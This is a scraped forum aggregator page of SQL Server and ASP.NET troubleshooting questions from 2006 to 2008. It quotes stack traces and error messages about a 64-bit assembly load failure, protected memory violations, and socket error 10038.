System.Web.Configuration.CompilationSection.LoadAssemblyHelper(String assemblyName, Boolean starDirective) +596
System.Web.Configuration.CompilationSection.LoadAllAssembliesFromAppDomainBinDirectory() +3479065
System.Web.Configuration.CompilationSection.LoadAssembly(AssemblyInfo ai) +46
System.Web.Compilation.BuildManager.GetReferencedAssemblies(CompilationSection compConfig) +177
System.Web.Compilation.BuildProvidersCompiler..ctor(VirtualPath configPath, Boolean supportLocalization, String outputAssemblyName) +180
System.Web.Compilation.ApplicationBuildProvider.GetGlobalAsaxBuildResult(Boolean isPrecompiledApp) +3446645
System.Web.Compilation.BuildManager.CompileGlobalAsax() +51
System.Web.Compilation.BuildManager.EnsureTopLevelFilesCompiled() +462
[HttpException (0x80004005): Attempted to load a 64-bit assembly on a 32-bit platform. Use ReflectionOnlyLoad() instead if trying to load for reflection purposes.]
System.Web.Compilation.BuildManager.ReportTopLevelCompilationException() +57
System.Web.Compilation.BuildManager.EnsureTopLevelFilesCompiled() +612
System.Web.Hosting.HostingEnvironment.Initialize(ApplicationManager appManager, IApplicationHost appHost, IConfigMapPathFactory configMapPathFactory, HostingEnvironmentParameters hostingParameters) +456
[HttpException (0x80004005): Attempted to load a 64-bit assembly on a 32-bit platform. Use ReflectionOnlyLoad() instead if trying to load for reflection purposes.]
System.Web.HttpRuntime.FirstRequestInit(HttpContext context) +3426871
System.Web.HttpRuntime.EnsureFirstRequestInit(HttpContext context) +88
System.Web.HttpRuntime.ProcessRequestInternal(HttpWorkerRequest wr) +149
Version Information: Microsoft .NET Framework Version:2.0.50727.42; ASP.NET
Version:2.0.50727.42
View 1 Replies
View Related
Feb 19, 2008
Hi,
I am getting error while opening the Data Base Engine in Sql server Management Studio.
We applied SP2. and restarted the server but no luck.
Error Message:Attempted to read or protected memory. This is often an indication that other memory is corrupt(mscorlib).
View 3 Replies
View Related
Nov 20, 2006
My apologies...I wasn't for sure where to post an error like this...
Over the last 2 months I have gotten this SQL Server error (twice). All existing processes will continue to work, however no new processes can be created and users cannot connect to the server. This is the exact text of the message in the SQL Server error log.
Operating system error 10038: An operation was attempted on something that is not a socket...
Error: 17059, Severity: 18, State: 0
Error accepting connection request via Net-Library 'SSNETLIB'. Execution continuing.
Error: 17882, Severity: 18, State:
While we can typically just stop SQL Server Service and restart the services...I have found it is best to restart the machine during non-production times to take care of any 'residual' effects of this error.
The SQL Server 2000 SP4 box with Windows 2003 Standard SP1 is well maintained by our I.T. team and it typically will run 4 or 5 months without a reboot.
Thank you...
...cordell...
View 5 Replies
View Related
Sep 28, 2007
Hello. I have received the follwoing error upon an attempt to Browse the Cube. All other tabs are functional, including the Calculations tab. We are running Windows Server 2003 SP2 and SQL Server 2005 SP2. Any suggestions would be greatly appreciated!
**EDIT** - Have confirmed SP1 for VS2005 is installed both locally and on server, also.
Attempted to read or write protected memory. This is often an indication that other memory is corrupt. (Microsoft Visual Studio)
------------------------------
Program Location:
at Microsoft.Office.Interop.Owc11.PivotView.get_FieldSets()
at Microsoft.AnalysisServices.Controls.PivotTableFontAdjustor.TransformFonts(Font font)
at Microsoft.AnalysisServices.Browse.CubeBrowser.UpdatePivotTable(Boolean translate)
at Microsoft.AnalysisServices.Browse.CubeBrowser.UpdateAll(Boolean translate)
at Microsoft.AnalysisServices.Browse.CubeBrowser.InitialUpdate()
at Microsoft.AnalysisServices.Browse.CubeBrowser.SupportFunctionWhichCanFail(FunctionWhichCanFail function)
View 4 Replies
View Related